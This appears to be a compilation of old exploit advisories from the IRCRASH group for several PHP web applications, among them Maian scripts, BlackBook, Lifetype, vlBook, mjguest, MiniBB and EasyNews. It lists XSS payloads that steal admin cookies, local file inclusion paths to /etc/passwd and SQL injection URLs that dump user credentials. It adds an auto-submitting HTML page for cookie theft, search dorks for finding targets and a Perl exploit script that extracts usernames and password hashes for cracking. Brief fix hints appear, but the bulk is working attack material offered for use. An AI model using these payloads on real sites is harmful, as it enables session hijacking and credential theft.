Script : Maian Recipe v1.2 Type : Xss Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/header.php?header=/titlescriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?header2=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?header3=;scriptalert('xss')/script XSS 4 : http://Example/admin/inc/header.php?header4=;scriptalert('xss')/script XSS 5 : http://Example/admin/inc/header.php?header5=;scriptalert('xss')/script XSS 6 : http://Example/admin/inc/header.php?header6=;scriptalert('xss')/script XSS 7 : http://Example/admin/inc/header.php?header7=;scriptalert('xss')/script XSS 8 : http://Example/admin/inc/header.php?header8=;scriptalert('xss')/script XSS 9 : http://Example/admin/inc/header.php?header9=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Music v1.1 Multiple Vulnerabilities (Xss/SQL Injection)
Script : Maian Music v1.1 Type : Multiple Vulnerabilities (Xss/SQL Injection) Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html SQL INJECTION : http://Example/index.php?cmd=albumalbum=[SQL INJECTION] XSS 1 : http://Example/index.php?cmd=searchkeywords=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script=scriptalert(document.cookie)/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchars() function ... This covers only the XSS items ; the SQL injection in album needs a parameterized query ( prepared statement ) instead . TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Links v3.1 XSS Vulnerabilities
Script : Maian Links v3.1 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/footer.php?msg_script3= scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script2=scriptalert(document.cookie)/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchars() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
BlackBook v1.0 Multiple XSS Vulnerabilities
Script : BlackBook v1.0 Type : Multiple XSS Vulnerabilities Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://membres.lycos.fr/eejj33/download/blackbook10.zip XSS 1 : http://Example/blackbook/footer.php?bookCopyright=scriptalert(document.cookie)/script XSS 2 : http://Example/blackbook/footer.php?ver=scriptalert(document.cookie)/script XSS 3 : http://Example/blackbook/header.php?bookName=/title scriptalert(document.cookie)/script XSS 4 : http://Example/blackbook/header.php?bookMetaTags=; scriptalert(document.cookie)/script XSS 5 : http://Example/blackbook/header.php?estiloCSS=; scriptalert(document.cookie)/script Solution : Filter With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrashatgmaildotcom
Lifetype 1.2.7 XSS Vulnerability
Script : Lifetype 1.2.7 Type : XSS Vulnerabilities Discovered by : Dr.Crash Or Khashayar Fereidani Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://garr.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.7.tar.bz2 URL : http://Example/admin.php?op=editArticleCategories Method : Post variable : searchTerms Query For Send : [XSS CODE] Example : Send With Post : scriptalert(document.cookie)/script You Can Get Admin Cookie With It Upload This File And Send This Page For Admin HTML PAGE FOR GET ADMIN COOKIE : html head/head body onLoad=javascript:document.form.submit() form action=http://Example/lifetype/admin.php?op=editArticleCategories; method=POST name=form input type=hidden name=searchTerms value=#x22;#x20; [XSS CODE] /form /body /html Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
vlBook 1.21 (ALL VERSION)
Script : vlBook 1.21 (ALL VERSION) Type : Multiple Remote Vulnerabilities (LFI/XSS) Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://home.vlab.info/vlbook_1.21.zip DORK : Powered by vlBook 1.21 #XSS Address : http://example/?l=; scriptalert('xss')/script #LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00 TNx : God..
mjguest 6.7 (ALL VERSION) Xss Redirection Vuln
Script : mjguest 6.7 (ALL VERSION) Type : Multiple Remote Vulnerabilities (XSS/REDIRECTION) Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.mdsjack.bo.it/files/mjguest_6.7gt.zip #XSS REDIRECT Address : http://example/mjguest/mjguest.php?do=redirectlevel= [XSS CODE]alert=wrong_passgoto=[REDIRECT URL] You Can Get Admin Session With THis Vuln . # For Example : http://example/mjguest/mjguest.php?do=redirectlevel=scriptalert(document.cookie)/scriptalert=wrong_passgoto=http://ircrash.com TNx : God.. Khashayar Fereidani Email : [EMAIL PROTECTED]
php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS)
Script : php-addressbook v2.0 Type : Multiple Remote Vulnerabilities (LFI/XSS) Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr DORK : php-addressbook v2.0 - Refreshed #XSS Address : http://Example/pad/?username=; scriptalert(document.cookie)/script #LFI Address : http://Example/pad/index.php?skin=../[FILENAME]$00 TNx : God.. Khashayar Fereidani Email : irancrash[At]Gmail.com
Minibb 2.2a XSS Vulnerability
# Minibb 2.2a XSS Vulnerability # # # #AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr # # # #Script Download : http://www.minibb.net/ # # # # #XSS # #XSS Address : http://example/bb_admin.php?action=searchusers2whatus=; / scriptalert(document.cookie)/scriptsearchus=id # # # You Can Get Admin Cookie With This Vuln # # # # # Site : Http://IRCRASH.COM # #TNX GOD#
Datalife Engine 6.7 XSRF
# Datalife Engine 6.7 XSRF Vulnerability By IRCRASH # # # #Discovered by : IRCRASH (R3d.w0rm) # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # # # # #Script Download : http://datalifecms.ir/download/DatalifeEngine6.7.zip # # # # XSRF # #XSRF Address : http://site.com/datalife-path/engine/modules/imagepreview.php?image=[XSRF] # # # # Our site : Http://IRCRASH.COM # #
EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)
#!/usr/bin/perl # EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI) # # # #Discovered by : IRCRASH By Dr.Crash # #Exploited By : Dr.Crash # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # # # # #Script Download : http://myiosoft.com/download/EasyNews/easynews-40tr.zip # # # # #XSS # #XSS Address : http://Sitename/staticpages/easypublish/index.php?PageSection=0page=individualtable=edp_pupublishread=scriptalert(document.cookie);/script # # # #SQL # #SQL Address : http://Sitename/dynamicpages/index.php?PageSection=7page=individualtable=edp_Help_Internal_Newsread=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers # # # #LFI # #SQL Address : http://Sitename/admin/login.php?lang=/../../../../../../../../../../../../../../../etc/passwd%00 # # # # Our site : Http://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; sub header { print * EasyNews-40tr Sql Injection exploit* *AUTHOR : IRCRASH * *Discovered by : IRCRASH TEAM BY Dr.Crash * *Exploited by : IRCRASH TEAM BY Dr.Crash * *Our Site : IRCRASH.COM* ; } sub usage { print * Usage : perl $0 -url http://Sitename/ ; } my %parameter = (); GetOptions(\%parameter, url=s); $url = $parameter{url}; if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} $vul = /dynamicpages/index.php?PageSection=7page=individualtable=edp_Help_Internal_Newsread=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers; sub Exploit() { $requestpage = $url.$vul; print Requesting Page is .$url.\n; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); 
$req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); #Debug Modus delete # at beginning of next line #print $content; @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print Username: .$name.\n; print Password: .$password.\n\n; print Crack Md5 Password And Login In : $url/admin/\n; print Enjoy My friend